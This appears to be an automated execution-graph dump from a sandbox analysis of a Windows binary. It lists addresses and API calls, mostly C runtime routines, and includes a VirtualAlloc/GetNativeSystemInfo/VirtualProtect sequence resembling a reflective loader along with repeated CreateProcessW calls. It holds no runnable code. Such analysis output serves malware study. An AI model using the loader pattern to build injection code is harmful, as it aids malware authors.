                                                                                        execution_graph 16679 7fef9d30215 16680 7fef9d30231 16679->16680 16684 7fef9d30302 16679->16684 16750 7fef9d38c80 16680->16750 16682 7fef9d30489 16770 7fef9d32d80 16682->16770 16687 7fef9d3040d 16684->16687 16757 7fef9d38c30 16684->16757 16685 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16688 7fef9d3027e OutputDebugStringW 16685->16688 16687->16682 16690 7fef9d31640 17 API calls 16687->16690 16691 7fef9d30296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16688->16691 16689 7fef9d304a3 16692 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16689->16692 16695 7fef9d3045c 16690->16695 16703 7fef9d302f2 16691->16703 16693 7fef9d304d0 16692->16693 16698 7fef9d3053d 16693->16698 16699 7fef9d32d80 17 API calls 16693->16699 16705 7fef9d30583 16693->16705 16697 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16695->16697 16697->16682 16700 7fef9d32d80 17 API calls 16698->16700 16701 7fef9d30510 16699->16701 16702 7fef9d30556 16700->16702 16707 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16701->16707 16708 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16702->16708 16709 7fef9d23280 __GSHandlerCheck 8 API calls 16703->16709 16704 7fef9d30357 16706 7fef9d303af 16704->16706 16710 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16704->16710 16783 7fef9d31590 16705->16783 16706->16687 16760 7fef9d31640 16706->16760 16707->16698 16708->16705 16712 7fef9d30cae 16709->16712 16710->16706 16714 7fef9d303e0 16715 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16714->16715 16715->16687 16716 7fef9d305fa 16717 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16716->16717 16718 7fef9d30652 16716->16718 16717->16718 16719 7fef9d31640 17 API calls 16718->16719 16721 7fef9d306b0 16718->16721 16720 7fef9d30683 16719->16720 16722 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16720->16722 16723 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16721->16723 16722->16721 16724 7fef9d30769 16723->16724 16725 7fef9d2d490 std::exception::_Copy_str 17 API calls 16724->16725 16740 7fef9d307bd 16724->16740 16726 7fef9d30790 16725->16726 16727 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16726->16727 16727->16740 16728 7fef9d30905 16728->16703 16729 7fef9d30a26 16728->16729 16730 7fef9d309a4 GetFileType 16728->16730 16731 7fef9d30ba5 16729->16731 16732 7fef9d30b97 OutputDebugStringW 16729->16732 16734 7fef9d309d0 16730->16734 16738 7fef9d309ce 16730->16738 16731->16703 16735 7fef9d30c23 16731->16735 16736 7fef9d38c80 _itow_s 17 API calls 16731->16736 16732->16731 16737 7fef9d309dd WriteConsoleW 16734->16737 16787 7fef9d2b470 16735->16787 16739 7fef9d30bf6 16736->16739 16737->16729 16741 7fef9d30a2b GetLastError 16737->16741 16742 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16738->16742 16743 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16739->16743 16740->16728 16786 7fef9d29360 LeaveCriticalSection 16740->16786 16741->16729 16741->16738 16745 7fef9d30ab5 16742->16745 16743->16735 16746 7fef9d30b26 WriteFile 16745->16746 16747 7fef9d30ad0 16745->16747 16746->16729 16749 7fef9d30add WriteFile 16747->16749 16749->16729 16751 7fef9d38cd3 16750->16751 16752 7fef9d38ca6 16750->16752 16754 7fef9d38d00 _itow_s 17 API calls 16751->16754 16752->16751 16753 7fef9d38cad 16752->16753 16813 7fef9d38d00 16753->16813 16756 7fef9d30251 16754->16756 16756->16685 16829 7fef9d386b0 16757->16829 16759 7fef9d38c74 16759->16704 16761 7fef9d31661 16760->16761 16762 7fef9d316c2 16761->16762 16763 7fef9d31700 _calloc_dbg_impl 16761->16763 16765 7fef9d2bd70 _invalid_parameter 17 API calls 16762->16765 16764 7fef9d31832 _calloc_dbg_impl 16763->16764 16767 7fef9d317f4 16763->16767 16766 7fef9d316f6 _calloc_dbg_impl 16764->16766 16769 7fef9d2bd70 _invalid_parameter 17 API calls 16764->16769 16765->16766 16766->16714 16768 7fef9d2bd70 _invalid_parameter 17 API calls 16767->16768 16768->16766 16769->16766 16771 7fef9d32da1 16770->16771 16772 7fef9d32e02 16771->16772 16774 7fef9d32e40 _calloc_dbg_impl 16771->16774 16773 7fef9d2bd70 _invalid_parameter 17 API calls 16772->16773 16777 7fef9d32e36 _calloc_dbg_impl 16773->16777 16775 7fef9d32f34 16774->16775 16776 7fef9d32f72 _calloc_dbg_impl 16774->16776 16778 7fef9d2bd70 _invalid_parameter 17 API calls 16775->16778 16779 7fef9d330b5 16776->16779 16781 7fef9d330f3 _calloc_dbg_impl 16776->16781 16777->16689 16778->16777 16780 7fef9d2bd70 _invalid_parameter 17 API calls 16779->16780 16780->16777 16781->16777 16782 7fef9d2bd70 _invalid_parameter 17 API calls 16781->16782 16782->16777 16784 7fef9d386b0 _wcsftime_l 17 API calls 16783->16784 16785 7fef9d315de 16784->16785 16785->16716 16786->16728 16788 7fef9d2b48d 16787->16788 16789 7fef9d2b4ce GetModuleFileNameW 16788->16789 16790 7fef9d2b4c4 16788->16790 16791 7fef9d2b4f2 16789->16791 16797 7fef9d2b538 16789->16797 16793 7fef9d23280 __GSHandlerCheck 8 API calls 16790->16793 16792 7fef9d31640 17 API calls 16791->16792 16794 7fef9d2b50b 16792->16794 16795 7fef9d2ba58 16793->16795 16796 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16794->16796 16795->16703 16796->16797 16801 7fef9d2b5f2 16797->16801 16851 7fef9d30fd0 16797->16851 16799 7fef9d2b5c5 16800 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16799->16800 16800->16801 16802 7fef9d31590 _snwprintf_s 17 API calls 16801->16802 16803 7fef9d2b940 16802->16803 16804 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16803->16804 16805 7fef9d2b998 16803->16805 16804->16805 16806 7fef9d31640 17 API calls 16805->16806 16809 7fef9d2b9f6 16805->16809 16807 7fef9d2b9c9 16806->16807 16808 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16807->16808 16808->16809 16809->16790 16861 7fef9d2cff0 16809->16861 16815 7fef9d38d25 16813->16815 16814 7fef9d38d7b 16816 7fef9d2bd70 _invalid_parameter 17 API calls 16814->16816 16815->16814 16817 7fef9d38db9 16815->16817 16826 7fef9d38daf 16816->16826 16818 7fef9d38e1a 16817->16818 16820 7fef9d38e58 _calloc_dbg_impl 16817->16820 16819 7fef9d2bd70 _invalid_parameter 17 API calls 16818->16819 16819->16826 16821 7fef9d38f5d 16820->16821 16822 7fef9d38f9b 16820->16822 16823 7fef9d2bd70 _invalid_parameter 17 API calls 16821->16823 16824 7fef9d3900e 16822->16824 16827 7fef9d3904c 16822->16827 16823->16826 16825 7fef9d2bd70 _invalid_parameter 17 API calls 16824->16825 16825->16826 16826->16756 16827->16826 16828 7fef9d2bd70 _invalid_parameter 17 API calls 16827->16828 16828->16826 16831 7fef9d386e6 16829->16831 16830 7fef9d3873c 16832 7fef9d2bd70 _invalid_parameter 17 API calls 16830->16832 16831->16830 16835 7fef9d3877a 16831->16835 16841 7fef9d38770 _calloc_dbg_impl 16832->16841 16833 7fef9d3880e 16838 7fef9d2bd70 _invalid_parameter 17 API calls 16833->16838 16834 7fef9d3884c 16836 7fef9d38992 16834->16836 16837 7fef9d38862 16834->16837 16835->16833 16835->16834 16835->16841 16839 7fef9d38350 _wcsftime_l 17 API calls 16836->16839 16844 7fef9d38350 16837->16844 16838->16841 16842 7fef9d388b1 _calloc_dbg_impl 16839->16842 16841->16759 16842->16841 16843 7fef9d2bd70 _invalid_parameter 17 API calls 16842->16843 16843->16841 16845 7fef9d3839b 16844->16845 16846 7fef9d383f1 16845->16846 16848 7fef9d3842f 16845->16848 16847 7fef9d2bd70 _invalid_parameter 17 API calls 16846->16847 16850 7fef9d38425 16847->16850 16849 7fef9d2bd70 _invalid_parameter 17 API calls 16848->16849 16848->16850 16849->16850 16850->16842 16852 7fef9d30ff7 16851->16852 16854 7fef9d30ff0 __SehTransFilter 16851->16854 16853 7fef9d31055 16852->16853 16856 7fef9d31093 _calloc_dbg_impl 16852->16856 16855 7fef9d2bd70 _invalid_parameter 17 API calls 16853->16855 16854->16799 16855->16854 16856->16854 16857 7fef9d3111a 16856->16857 16859 7fef9d31158 16856->16859 16858 7fef9d2bd70 _invalid_parameter 17 API calls 16857->16858 16858->16854 16859->16854 16860 7fef9d2bd70 _invalid_parameter 17 API calls 16859->16860 16860->16854 16863 7fef9d2d02a 16861->16863 16862 7fef9d2d1d8 DecodePointer 16864 7fef9d2d1e8 16862->16864 16863->16862 16866 7fef9d2bd70 _invalid_parameter 17 API calls 16863->16866 16865 7fef9d2ba2b 16864->16865 16867 7fef9d27090 _exit 33 API calls 16864->16867 16869 7fef9d2d209 16864->16869 16873 7fef9d27090 16865->16873 16868 7fef9d2d1ce 16866->16868 16867->16869 16868->16862 16868->16865 16871 7fef9d2d289 16869->16871 16876 7fef9d23d00 RtlEncodePointer 16869->16876 16871->16865 16877 7fef9d29360 LeaveCriticalSection 16871->16877 16874 7fef9d27280 _exit 33 API calls 16873->16874 16875 7fef9d270a9 16874->16875 16875->16790 16876->16871 16877->16865 16878 7fef9d2ae14 16879 7fef9d2b390 16878->16879 16880 7fef9d23280 __GSHandlerCheck 8 API calls 16879->16880 16881 7fef9d2b3a0 16880->16881 17919 7fef9d32c10 17920 7fef9d32c53 17919->17920 17921 7fef9d32c24 _updatetlocinfoEx_nolock 17919->17921 17923 7fef9d29360 LeaveCriticalSection 17921->17923 17923->17920 17924 7fef9d3d410 17929 7fef9d3d3e0 17924->17929 17927 7fef9d3d43c 17928 7fef9d3d710 _Ref_count LeaveCriticalSection 17928->17927 17932 7fef9d40070 17929->17932 17935 7fef9d40083 _free_nolock 17932->17935 17934 7fef9d3d402 17934->17927 17934->17928 17936 7fef9d29360 LeaveCriticalSection 17935->17936 17936->17934 18478 180024ee6 18479 180024eea 18478->18479 18480 180024f52 18478->18480 18481 18002506a CreateProcessW 18480->18481 17937 7fef9d27816 17940 7fef9d27826 _calloc_dbg 17937->17940 17938 7fef9d27ab9 17939 7fef9d27ce0 SetHandleCount 17938->17939 17943 7fef9d27b95 GetStdHandle 17938->17943 17945 7fef9d27c7b 17938->17945 17944 7fef9d27aaf 17939->17944 17940->17938 17941 7fef9d27a32 InitializeCriticalSectionAndSpinCount 17940->17941 17942 7fef9d27a19 GetFileType 17940->17942 17941->17938 17941->17944 17942->17938 17942->17941 17943->17945 17946 7fef9d27bb9 17943->17946 17945->17939 17946->17945 17947 7fef9d27bc8 GetFileType 17946->17947 17947->17945 17948 7fef9d27beb InitializeCriticalSectionAndSpinCount 17947->17948 17948->17944 17948->17945 16502 7fef9d2461b 16505 7fef9d24625 _calloc_dbg_impl 16502->16505 16504 7fef9d248be 16506 7fef9d29360 LeaveCriticalSection 16505->16506 16506->16504 16888 7fef9d36203 16889 7fef9d3616e _CrtMemDumpAllObjectsSince wcsxfrm 16888->16889 16890 7fef9d36238 MultiByteToWideChar 16889->16890 16891 7fef9d361c8 _LocaleUpdate::~_LocaleUpdate 16889->16891 16890->16891 16630 1800178f4 16633 18000ffc0 16630->16633 16632 180017924 16637 18001000e 16633->16637 16634 180011bd0 16645 1800053b0 16634->16645 16637->16634 16638 1800116b2 16637->16638 16639 18001667c 16637->16639 16638->16632 16640 1800166ac 16639->16640 16643 180016ad3 16640->16643 16649 180023624 16640->16649 16653 18000bc98 16640->16653 16657 1800270c0 16640->16657 16643->16637 16647 1800053e0 16645->16647 16646 18001a10c CreateProcessW 16648 18000598b 16646->16648 16647->16646 16647->16648 16648->16638 16652 180023662 16649->16652 16651 1800237ae 16651->16640 16652->16651 16661 18001a10c 16652->16661 16654 18000bcde 16653->16654 16655 18001a10c CreateProcessW 16654->16655 16656 18000c521 16654->16656 16655->16656 16656->16640 16660 180027157 16657->16660 16658 180027fe1 16658->16640 16659 18001a10c CreateProcessW 16659->16660 16660->16658 16660->16659 16662 18001a166 16661->16662 16663 180024f28 CreateProcessW 16662->16663 16664 18001a335 16663->16664 16664->16651 16892 7fef9d40204 16895 7fef9d4023d 16892->16895 16894 7fef9d403d7 16895->16894 16896 7fef9d40326 16895->16896 16898 7fef9d3ab10 16895->16898 16896->16894 16902 7fef9d39290 16896->16902 16899 7fef9d3ab23 16898->16899 16900 7fef9d3ab35 16898->16900 16899->16896 16900->16899 16901 7fef9d2bd70 _invalid_parameter 17 API calls 16900->16901 16901->16899 16903 7fef9d392d8 16902->16903 16908 7fef9d392b6 __doserrno 16902->16908 16904 7fef9d39341 __doserrno 16903->16904 16910 7fef9d3938c 16903->16910 16906 7fef9d2bd70 _invalid_parameter 17 API calls 16904->16906 16905 7fef9d3945b 16916 7fef9d3fae0 16905->16916 16906->16908 16908->16894 16910->16905 16911 7fef9d39410 __doserrno 16910->16911 16913 7fef9d2bd70 _invalid_parameter 17 API calls 16911->16913 16913->16908 16914 7fef9d394a6 __doserrno 16930 7fef9d3fbc0 LeaveCriticalSection 16914->16930 16917 7fef9d3fb7a 16916->16917 16920 7fef9d3fb25 16916->16920 16918 7fef9d39464 16917->16918 16919 7fef9d3fb81 EnterCriticalSection 16917->16919 16918->16914 16924 7fef9d39520 16918->16924 16919->16918 16921 7fef9d3fb56 16920->16921 16922 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16920->16922 16931 7fef9d29360 LeaveCriticalSection 16921->16931 16922->16921 16932 7fef9d3f900 16924->16932 16926 7fef9d39545 16927 7fef9d3959d SetFilePointer 16926->16927 16929 7fef9d39552 _dosmaperr 16926->16929 16928 7fef9d395c1 GetLastError 16927->16928 16927->16929 16928->16929 16929->16914 16930->16908 16931->16917 16933 7fef9d3f935 16932->16933 16935 7fef9d3f913 __doserrno 16932->16935 16934 7fef9d3f99e __doserrno 16933->16934 16937 7fef9d3f9e9 __doserrno 16933->16937 16936 7fef9d2bd70 _invalid_parameter 17 API calls 16934->16936 16935->16926 16936->16935 16937->16935 16938 7fef9d2bd70 _invalid_parameter 17 API calls 16937->16938 16938->16935 16939 7fef9d41200 16942 7fef9d2ed30 16939->16942 16941 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16943 7fef9d2ed3e 16942->16943 16945 7fef9d2ed4c 16943->16945 16948 7fef9d2cf80 DecodePointer 16943->16948 16946 7fef9d2cf80 _inconsistency 36 API calls 16945->16946 16947 7fef9d2ed88 16945->16947 16946->16947 16947->16941 16949 7fef9d2cf9e 16948->16949 16952 7fef9d2cf50 16949->16952 16954 7fef9d2cf59 16952->16954 16956 7fef9d339e0 16954->16956 16957 7fef9d339fa 16956->16957 16966 7fef9d2d430 DecodePointer 16957->16966 16959 7fef9d33a09 16960 7fef9d33a20 16959->16960 16961 7fef9d2cff0 terminate 34 API calls 16959->16961 16962 7fef9d33a42 16960->16962 16963 7fef9d2be50 _invalid_parameter 14 API calls 16960->16963 16961->16960 16964 7fef9d27090 _exit 33 API calls 16962->16964 16963->16962 16965 7fef9d2cf78 16964->16965 16965->16945 16966->16959 17463 7fef9d23909 17464 7fef9d23913 __SehTransFilter 17463->17464 17465 7fef9d239db __SehTransFilter 17464->17465 17466 7fef9d23a71 RtlUnwindEx 17464->17466 17466->17465 17955 7fef9d23409 17956 7fef9d23e00 3 API calls 17955->17956 17957 7fef9d2340e 17956->17957 17960 7fef9d288d0 HeapDestroy 17957->17960 17959 7fef9d23413 17960->17959 18523 7fef9d3c30d 18524 7fef9d3c31a get_int64_arg _get_printf_count_output 18523->18524 18525 7fef9d3c39d 18524->18525 18526 7fef9d3c3f2 18524->18526 18527 7fef9d2bd70 _invalid_parameter 17 API calls 18525->18527 18533 7fef9d3b530 wctomb_s 19 API calls 18526->18533 18535 7fef9d3b99c 18526->18535 18530 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18527->18530 18528 7fef9d3cc93 18528->18530 18532 7fef9d2bd70 _invalid_parameter 17 API calls 18528->18532 18529 7fef9d23280 __GSHandlerCheck 8 API calls 18531 7fef9d3cd90 18529->18531 18530->18529 18532->18530 18533->18526 18534 7fef9d3bada 18536 7fef9d2bd70 _invalid_parameter 17 API calls 18534->18536 18535->18528 18535->18534 18536->18530 16670 1c0000 16671 1c0183 16670->16671 16672 1c043e VirtualAlloc 16671->16672 16675 1c0462 16672->16675 16673 1c0531 GetNativeSystemInfo 16674 1c056d VirtualAlloc 16673->16674 16676 1c0a00 16673->16676 16678 1c058b 16674->16678 16675->16673 16675->16676 16677 1c09d9 VirtualProtect 16677->16678 16678->16676 16678->16677 16419 7fef9d23d30 16437 7fef9d27540 16419->16437 16424 7fef9d23d4e FlsAlloc 16427 7fef9d23d73 _calloc_dbg 16424->16427 16428 7fef9d23d6a 16424->16428 16425 7fef9d23d42 16426 7fef9d23e00 3 API calls 16425->16426 16429 7fef9d23d47 16426->16429 16431 7fef9d23da4 FlsSetValue 16427->16431 16432 7fef9d23db9 16427->16432 16430 7fef9d23e00 3 API calls 16428->16430 16430->16429 16431->16432 16433 7fef9d23dc2 16431->16433 16434 7fef9d23e00 3 API calls 16432->16434 16446 7fef9d23e30 16433->16446 16434->16429 16452 7fef9d23d00 RtlEncodePointer 16437->16452 16439 7fef9d27549 _initp_misc_winsig 16453 7fef9d2cf20 EncodePointer 16439->16453 16441 7fef9d23d39 16442 7fef9d28fe0 16441->16442 16445 7fef9d28ff6 16442->16445 16443 7fef9d29022 InitializeCriticalSectionAndSpinCount 16444 7fef9d23d3e 16443->16444 16443->16445 16444->16424 16444->16425 16445->16443 16445->16444 16447 7fef9d23ead 16446->16447 16454 7fef9d29360 LeaveCriticalSection 16447->16454 16449 7fef9d23ec7 _updatetlocinfoEx_nolock 16455 7fef9d29360 LeaveCriticalSection 16449->16455 16451 7fef9d23dce GetCurrentThreadId 16451->16429 16452->16439 16453->16441 16454->16449 16455->16451 17467 7fef9d23130 17468 7fef9d23170 __GSHandlerCheck 8 API calls 17467->17468 17469 7fef9d23160 17468->17469 17961 7fef9d2e830 17962 7fef9d2e857 17961->17962 17963 7fef9d33cc0 __SehTransFilter 39 API calls 17962->17963 17964 7fef9d2e8e3 17963->17964 17965 7fef9d3c435 17966 7fef9d3c479 _CrtMemDumpAllObjectsSince 17965->17966 17967 7fef9d3c598 DecodePointer 17966->17967 17968 7fef9d3c60d _CrtMemDumpAllObjectsSince 17967->17968 17969 7fef9d3c62b DecodePointer 17968->17969 17970 7fef9d3c652 _CrtMemDumpAllObjectsSince 17968->17970 17969->17970 17971 7fef9d3c676 DecodePointer 17970->17971 17980 7fef9d3c69d std::exception::_Copy_str 17970->17980 17971->17980 17972 7fef9d3b99c 17973 7fef9d3cc93 17972->17973 17978 7fef9d3bada 17972->17978 17974 7fef9d2bd70 _invalid_parameter 17 API calls 17973->17974 17977 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17973->17977 17974->17977 17975 7fef9d3b530 wctomb_s 19 API calls 17975->17980 17976 7fef9d23280 __GSHandlerCheck 8 API calls 17979 7fef9d3cd90 17976->17979 17977->17976 17981 7fef9d2bd70 _invalid_parameter 17 API calls 17978->17981 17980->17972 17980->17975 17981->17977 16465 7fef9d23433 16466 7fef9d23437 16465->16466 16467 7fef9d23446 16465->16467 16468 7fef9d27d00 _ioterm DeleteCriticalSection 16466->16468 16469 7fef9d2343c 16468->16469 16470 7fef9d23e00 3 API calls 16469->16470 16471 7fef9d23441 16470->16471 16473 7fef9d288d0 HeapDestroy 16471->16473 16473->16467 17982 7fef9d3d830 17983 7fef9d3d8aa 17982->17983 17984 7fef9d3d97b 17983->17984 17985 7fef9d3d926 17983->17985 17987 7fef9d3d9ee 17984->17987 17993 7fef9d3da43 17984->17993 17986 7fef9d2bd70 _invalid_parameter 17 API calls 17985->17986 17990 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17986->17990 17988 7fef9d2bd70 _invalid_parameter 17 API calls 17987->17988 17988->17990 17989 7fef9d23280 __GSHandlerCheck 8 API calls 17991 7fef9d3ed9e 17989->17991 17990->17989 17992 7fef9d3eca1 17992->17990 17994 7fef9d2bd70 _invalid_parameter 17 API calls 17992->17994 17993->17992 17995 7fef9d3dbb5 17993->17995 17994->17990 17996 7fef9d2bd70 _invalid_parameter 17 API calls 17995->17996 17996->17990 17997 7fef9d26c32 17998 7fef9d26c3c 17997->17998 17999 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17998->17999 18000 7fef9d26c7a _CrtMemDumpAllObjectsSince 17998->18000 18001 7fef9d23280 __GSHandlerCheck 8 API calls 17999->18001 18003 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 18000->18003 18004 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 18000->18004 18002 7fef9d26e89 18001->18002 18003->18004 18005 7fef9d2c0c0 _swprintf_p 17 API calls 18004->18005 18007 7fef9d26dc7 18005->18007 18006 7fef9d26e12 18007->18006 18008 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18007->18008 18008->18006 16976 7fef9d33e3b 16977 7fef9d33ec7 16976->16977 16980 7fef9d2e790 16977->16980 16987 7fef9d2e500 16980->16987 16984 7fef9d2e7d0 __SehTransFilter 16995 7fef9d34f20 16984->16995 16986 7fef9d2e81e 16988 7fef9d33b40 __StateFromControlPc 36 API calls 16987->16988 16989 7fef9d2e539 16988->16989 16990 7fef9d2e5c2 RtlLookupFunctionEntry 16989->16990 16991 7fef9d2e601 16989->16991 16990->16991 16992 7fef9d33b40 16991->16992 17002 7fef9d33a60 16992->17002 17008 7fef9d33b70 16995->17008 16997 7fef9d2cf80 _inconsistency 36 API calls 17001 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 16997->17001 16998 7fef9d35103 16999 7fef9d3514a __SetState 16998->16999 17000 7fef9d2cf80 _inconsistency 36 API calls 16998->17000 16999->16986 17000->16999 17001->16997 17001->16998 17003 7fef9d33a7b 17002->17003 17004 7fef9d33a7d 17002->17004 17006 7fef9d2cf80 _inconsistency 36 API calls 17003->17006 17007 7fef9d33aa5 17003->17007 17005 7fef9d2cf80 _inconsistency 36 API calls 17004->17005 17005->17003 17006->17007 17007->16984 17009 7fef9d33b9a 17008->17009 17010 7fef9d33ba9 17008->17010 17011 7fef9d33b40 __StateFromControlPc 36 API calls 17009->17011 17010->17001 17011->17010 16495 18001a10c 16496 18001a166 16495->16496 16499 180024f28 16496->16499 16498 18001a335 16500 180024fcb 16499->16500 16501 18002506a CreateProcessW 16500->16501 16501->16498 18009 7fef9d2443c 18010 7fef9d2444c 18009->18010 18013 7fef9d29360 LeaveCriticalSection 18010->18013 18012 7fef9d248be 18013->18012 17490 7fef9d39939 17491 7fef9d39951 __doserrno 17490->17491 17492 7fef9d2bd70 _invalid_parameter 17 API calls 17491->17492 17493 7fef9d399d7 17492->17493 17494 7fef9d23280 __GSHandlerCheck 8 API calls 17493->17494 17495 7fef9d3a9f5 17494->17495 18014 7fef9d3e424 18015 7fef9d3e469 _CrtMemDumpAllObjectsSince 18014->18015 18016 7fef9d3e588 DecodePointer 18015->18016 18017 7fef9d3e5fd _CrtMemDumpAllObjectsSince 18016->18017 18018 7fef9d3e61b DecodePointer 18017->18018 18019 7fef9d3e642 _CrtMemDumpAllObjectsSince 18017->18019 18018->18019 18020 7fef9d3e666 DecodePointer 18019->18020 18022 7fef9d3e68d std::exception::_Copy_str 18019->18022 18020->18022 18021 7fef9d3eadf 18024 7fef9d3ef10 25 API calls 18021->18024 18022->18021 18023 7fef9d3eec0 25 API calls 18022->18023 18031 7fef9d3da75 18022->18031 18023->18021 18025 7fef9d3eafd 18024->18025 18026 7fef9d3eb33 18025->18026 18028 7fef9d3eec0 25 API calls 18025->18028 18027 7fef9d3ec29 18026->18027 18041 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18026->18041 18029 7fef9d3ebda 18027->18029 18030 7fef9d3ef10 25 API calls 18027->18030 18028->18026 18029->18031 18034 7fef9d3eec0 25 API calls 18029->18034 18030->18029 18032 7fef9d3eca1 18031->18032 18037 7fef9d3dbb5 18031->18037 18033 7fef9d2bd70 _invalid_parameter 17 API calls 18032->18033 18036 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18032->18036 18033->18036 18034->18031 18035 7fef9d23280 __GSHandlerCheck 8 API calls 18038 7fef9d3ed9e 18035->18038 18036->18035 18040 7fef9d2bd70 _invalid_parameter 17 API calls 18037->18040 18039 7fef9d3f000 wcsxfrm 2 API calls 18039->18041 18040->18036 18041->18029 18041->18039 18042 7fef9d3ee40 25 API calls 18041->18042 18042->18041 17012 7fef9d25a25 17013 7fef9d25a37 17012->17013 17014 7fef9d2bd70 _invalid_parameter 17 API calls 17013->17014 17015 7fef9d25aaf 17014->17015 17496 7fef9d34920 17499 7fef9d3d530 17496->17499 17502 7fef9d3d580 17499->17502 17503 7fef9d3d59a std::exception::_Tidy 17502->17503 17505 7fef9d3493d 17502->17505 17503->17505 17506 7fef9d3d660 17503->17506 17507 7fef9d3d676 std::exception::_Copy_str malloc 17506->17507 17509 7fef9d3d6bf 17506->17509 17508 7fef9d2d490 std::exception::_Copy_str 17 API calls 17507->17508 17507->17509 17508->17509 17509->17505 18545 7fef9d29328 18546 7fef9d29336 EnterCriticalSection 18545->18546 18547 7fef9d2932c 18545->18547 18547->18546 18548 7fef9d3ff2d 18549 7fef9d3ff37 18548->18549 18550 7fef9d40042 18549->18550 18551 7fef9d3ff47 18549->18551 18563 7fef9d29360 LeaveCriticalSection 18550->18563 18552 7fef9d4003d 18551->18552 18555 7fef9d3ae90 _lock_file2 EnterCriticalSection 18551->18555 18554 7fef9d4004c 18557 7fef9d3ff97 18555->18557 18556 7fef9d3ffd0 18558 7fef9d3af60 _unlock_file2 2 API calls 18556->18558 18557->18556 18559 7fef9d3ffe1 18557->18559 18560 7fef9d3ffbb 18557->18560 18558->18552 18559->18556 18562 7fef9d3fd70 _fflush_nolock 25 API calls 18559->18562 18561 7fef9d3fd70 _fflush_nolock 25 API calls 18560->18561 18561->18556 18562->18556 18563->18554 17514 7fef9d2b12b 17515 7fef9d2b14c 17514->17515 17517 7fef9d2b2e0 17515->17517 17518 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17515->17518 17516 7fef9d2b33e 17530 7fef9d30cc0 17516->17530 17517->17516 17519 7fef9d2d490 std::exception::_Copy_str 17 API calls 17517->17519 17518->17517 17521 7fef9d2b311 17519->17521 17523 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17521->17523 17523->17516 17524 7fef9d2b37d 17528 7fef9d23280 __GSHandlerCheck 8 API calls 17524->17528 17525 7fef9d2cff0 terminate 34 API calls 17526 7fef9d2b373 17525->17526 17527 7fef9d27090 _exit 33 API calls 17526->17527 17527->17524 17529 7fef9d2b3a0 17528->17529 17548 7fef9d23d00 RtlEncodePointer 17530->17548 17532 7fef9d30cf6 17533 7fef9d30d23 LoadLibraryW 17532->17533 17534 7fef9d30e15 17532->17534 17535 7fef9d30d44 GetProcAddress 17533->17535 17543 7fef9d30d3d 17533->17543 17537 7fef9d30e39 DecodePointer DecodePointer 17534->17537 17547 7fef9d30e68 17534->17547 17536 7fef9d30d6a 7 API calls 17535->17536 17535->17543 17536->17534 17540 7fef9d30df3 GetProcAddress EncodePointer 17536->17540 17537->17547 17538 7fef9d30f60 DecodePointer 17538->17543 17539 7fef9d23280 __GSHandlerCheck 8 API calls 17544 7fef9d2b358 17539->17544 17540->17534 17541 7fef9d30eed DecodePointer 17542 7fef9d30f0d 17541->17542 17542->17538 17545 7fef9d30f2f DecodePointer 17542->17545 17543->17539 17544->17524 17544->17525 17545->17538 17546 7fef9d30ec8 17545->17546 17546->17538 17547->17541 17547->17542 17547->17546 17548->17532 17549 7fef9d234d5 17550 7fef9d234da _calloc_dbg 17549->17550 17551 7fef9d2350b FlsSetValue 17550->17551 17555 7fef9d23548 17550->17555 17552 7fef9d23520 17551->17552 17551->17555 17553 7fef9d23e30 LeaveCriticalSection 17552->17553 17554 7fef9d2352c GetCurrentThreadId 17553->17554 17554->17555 18564 7fef9d25ad9 18565 7fef9d25add 18564->18565 18566 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18565->18566 18567 7fef9d25b3a 18566->18567 18570 7fef9d29360 LeaveCriticalSection 18567->18570 18569 7fef9d25c14 18570->18569 18043 7fef9d233d6 18046 7fef9d288d0 HeapDestroy 18043->18046 18045 7fef9d233db 18046->18045 18582 7fef9d266da 18583 7fef9d26725 18582->18583 18586 7fef9d26745 18582->18586 18583->18586 18588 7fef9d29a70 18583->18588 18584 7fef9d2677f 18586->18584 18587 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18586->18587 18587->18584 18590 7fef9d29a79 _updatetlocinfoEx_nolock 18588->18590 18589 7fef9d29ad8 18589->18586 18590->18589 18592 7fef9d29360 LeaveCriticalSection 18590->18592 18592->18589 17556 7fef9d268c4 17557 7fef9d268d1 17556->17557 17558 7fef9d26ba6 17557->17558 17561 7fef9d268ed _CrtIsValidPointer 17557->17561 17574 7fef9d29360 LeaveCriticalSection 17558->17574 17560 7fef9d26bb0 17562 7fef9d2695e IsBadReadPtr 17561->17562 17564 7fef9d26976 17561->17564 17573 7fef9d2692f 17561->17573 17562->17564 17563 7fef9d26ad2 17566 7fef9d26b2d 17563->17566 17567 7fef9d26add 17563->17567 17564->17563 17565 7fef9d26a29 17564->17565 17568 7fef9d26abe 17565->17568 17569 7fef9d26a86 IsBadReadPtr 17565->17569 17572 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17566->17572 